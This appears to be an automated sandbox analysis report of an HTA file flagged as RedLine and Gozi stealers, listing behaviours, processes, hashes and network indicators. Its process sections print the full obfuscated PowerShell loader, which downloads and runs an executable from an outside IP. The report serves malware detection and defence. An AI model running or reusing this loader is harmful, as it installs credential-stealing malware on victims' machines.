Analysis Overview
SHA256
e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad
Threat Level: Known bad
The file 55.hta was found to be: Known bad.
Malicious Activity Summary
RedLine
Gozi, Gozi IFSB
RedLine payload
Executes dropped EXE
Downloads MZ/PE file
Blocklisted process makes network request
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-05 01:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-05 01:33
Reported
2022-08-05 01:36
Platform
win7-20220715-en
Max time kernel
109s
Max time network
106s
Command Line
Signatures
Gozi, Gozi IFSB
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinZip.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
C:\Users\Admin\AppData\Roaming\bartor.exe
"C:\Users\Admin\AppData\Roaming\bartor.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
C:\Users\Admin\Downloads\WinZip.exe
C:\Users\Admin\Downloads\WinZip.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 7
Network
| Country | Destination | Domain | Proto |
| RU | 193.56.146.131:80 | 193.56.146.131 | tcp |
| RU | 193.56.146.131:80 | 193.56.146.131 | tcp |
| NL | 80.66.87.52:2500 | tcp |
Files
memory/1136-54-0x0000000075681000-0x0000000075683000-memory.dmp
memory/1876-55-0x0000000000000000-mapping.dmp
memory/1876-57-0x0000000072740000-0x0000000072CEB000-memory.dmp
\Users\Admin\AppData\Roaming\bartor.exe
| MD5 | 0f2be4fe0362766dcf339d4c03326bc4 |
| SHA1 | 69e26e9e75e8a8359d232d8e14318b9235e1a828 |
| SHA256 | 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529 |
| SHA512 | 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150 |
memory/1916-59-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\bartor.exe
| MD5 | 0f2be4fe0362766dcf339d4c03326bc4 |
| SHA1 | 69e26e9e75e8a8359d232d8e14318b9235e1a828 |
| SHA256 | 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529 |
| SHA512 | 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150 |
C:\Users\Admin\AppData\Roaming\bartor.exe
| MD5 | 0f2be4fe0362766dcf339d4c03326bc4 |
| SHA1 | 69e26e9e75e8a8359d232d8e14318b9235e1a828 |
| SHA256 | 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529 |
| SHA512 | 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150 |
memory/1876-62-0x0000000072740000-0x0000000072CEB000-memory.dmp
memory/1916-63-0x0000000000320000-0x00000000003A2000-memory.dmp
memory/1916-65-0x0000000000470000-0x0000000000488000-memory.dmp
memory/696-66-0x0000000000000000-mapping.dmp
\Users\Admin\Downloads\WinZip.exe
| MD5 | 468042278a3e4841d3e33ccca10d99ca |
| SHA1 | 22532f37096a200d448420359c01bbebaaf6b820 |
| SHA256 | b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86 |
| SHA512 | 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf |
C:\Users\Admin\Downloads\WinZip.exe
| MD5 | 468042278a3e4841d3e33ccca10d99ca |
| SHA1 | 22532f37096a200d448420359c01bbebaaf6b820 |
| SHA256 | b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86 |
| SHA512 | 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf |
memory/1944-70-0x0000000000000000-mapping.dmp
\Users\Admin\Downloads\WinZip.exe
| MD5 | 468042278a3e4841d3e33ccca10d99ca |
| SHA1 | 22532f37096a200d448420359c01bbebaaf6b820 |
| SHA256 | b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86 |
| SHA512 | 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf |
C:\Users\Admin\Downloads\WinZip.exe
| MD5 | 468042278a3e4841d3e33ccca10d99ca |
| SHA1 | 22532f37096a200d448420359c01bbebaaf6b820 |
| SHA256 | b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86 |
| SHA512 | 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf |
memory/1944-73-0x0000000000230000-0x0000000000330000-memory.dmp
memory/1944-74-0x00000000003A0000-0x00000000003AB000-memory.dmp
memory/1944-75-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1944-76-0x0000000000610000-0x000000000061D000-memory.dmp
memory/1944-79-0x0000000000230000-0x0000000000330000-memory.dmp
memory/1944-80-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1916-81-0x0000000000620000-0x0000000000664000-memory.dmp
memory/1916-82-0x0000000000310000-0x0000000000316000-memory.dmp
memory/1580-83-0x0000000000000000-mapping.dmp
memory/1444-84-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-05 01:33
Reported
2022-08-05 01:36
Platform
win10v2004-20220721-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
Gozi, Gozi IFSB
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\WinZip.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\bartor.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
C:\Users\Admin\AppData\Roaming\bartor.exe
"C:\Users\Admin\AppData\Roaming\bartor.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
C:\Users\Admin\Downloads\WinZip.exe
C:\Users\Admin\Downloads\WinZip.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 7
Network
| Country | Destination | Domain | Proto |
| RU | 193.56.146.131:80 | 193.56.146.131 | tcp |
| RU | 193.56.146.131:80 | 193.56.146.131 | tcp |
| IE | 20.50.73.9:443 | tcp | |
| NL | 67.26.105.254:80 | tcp | |
| US | 8.8.8.8:53 | trackingg-protectioon.cdn1.mozilla.net | udp |
| NL | 80.66.87.52:2500 | tcp | |
| NL | 67.26.105.254:80 | tcp | |
| NL | 194.76.225.168:80 | tcp |
Files
memory/876-130-0x0000000000000000-mapping.dmp
memory/876-131-0x0000000002AC0000-0x0000000002AF6000-memory.dmp
memory/876-132-0x00000000055E0000-0x0000000005C08000-memory.dmp
memory/876-133-0x0000000005430000-0x0000000005452000-memory.dmp
memory/876-134-0x0000000005D10000-0x0000000005D76000-memory.dmp
memory/876-135-0x0000000005DF0000-0x0000000005E56000-memory.dmp
memory/876-136-0x00000000063D0000-0x00000000063EE000-memory.dmp
memory/876-137-0x0000000007450000-0x00000000074E6000-memory.dmp
memory/876-138-0x0000000006880000-0x000000000689A000-memory.dmp
memory/876-139-0x0000000006900000-0x0000000006922000-memory.dmp
memory/876-140-0x0000000007AA0000-0x0000000008044000-memory.dmp
memory/876-141-0x00000000086D0000-0x0000000008D4A000-memory.dmp
memory/4600-142-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\bartor.exe
| MD5 | 0f2be4fe0362766dcf339d4c03326bc4 |
| SHA1 | 69e26e9e75e8a8359d232d8e14318b9235e1a828 |
| SHA256 | 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529 |
| SHA512 | 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150 |
C:\Users\Admin\AppData\Roaming\bartor.exe
| MD5 | 0f2be4fe0362766dcf339d4c03326bc4 |
| SHA1 | 69e26e9e75e8a8359d232d8e14318b9235e1a828 |
| SHA256 | 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529 |
| SHA512 | 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150 |
memory/4600-145-0x0000000000530000-0x00000000005B2000-memory.dmp
memory/4200-146-0x0000000000000000-mapping.dmp
memory/2668-147-0x0000000000000000-mapping.dmp
C:\Users\Admin\Downloads\WinZip.exe
| MD5 | 468042278a3e4841d3e33ccca10d99ca |
| SHA1 | 22532f37096a200d448420359c01bbebaaf6b820 |
| SHA256 | b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86 |
| SHA512 | 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf |
C:\Users\Admin\Downloads\WinZip.exe
| MD5 | 468042278a3e4841d3e33ccca10d99ca |
| SHA1 | 22532f37096a200d448420359c01bbebaaf6b820 |
| SHA256 | b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86 |
| SHA512 | 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf |
memory/2668-150-0x0000000000529000-0x000000000053A000-memory.dmp
memory/2668-151-0x00000000004E0000-0x00000000004EB000-memory.dmp
memory/2668-152-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2668-153-0x0000000000610000-0x000000000061D000-memory.dmp
memory/2668-156-0x0000000000529000-0x000000000053A000-memory.dmp
memory/2668-157-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4600-158-0x000000000BA70000-0x000000000C088000-memory.dmp
memory/4600-159-0x000000000B4E0000-0x000000000B4F2000-memory.dmp
memory/4600-160-0x000000000B610000-0x000000000B71A000-memory.dmp
memory/4600-161-0x000000000B540000-0x000000000B57C000-memory.dmp
memory/4600-162-0x000000000C090000-0x000000000C122000-memory.dmp
memory/4600-163-0x000000000C2B0000-0x000000000C326000-memory.dmp
memory/4600-164-0x000000000C470000-0x000000000C48E000-memory.dmp
memory/4600-165-0x000000000CDE0000-0x000000000CFA2000-memory.dmp
memory/4600-166-0x000000000D4E0000-0x000000000DA0C000-memory.dmp
memory/3448-167-0x0000000000000000-mapping.dmp
memory/2200-168-0x0000000000000000-mapping.dmp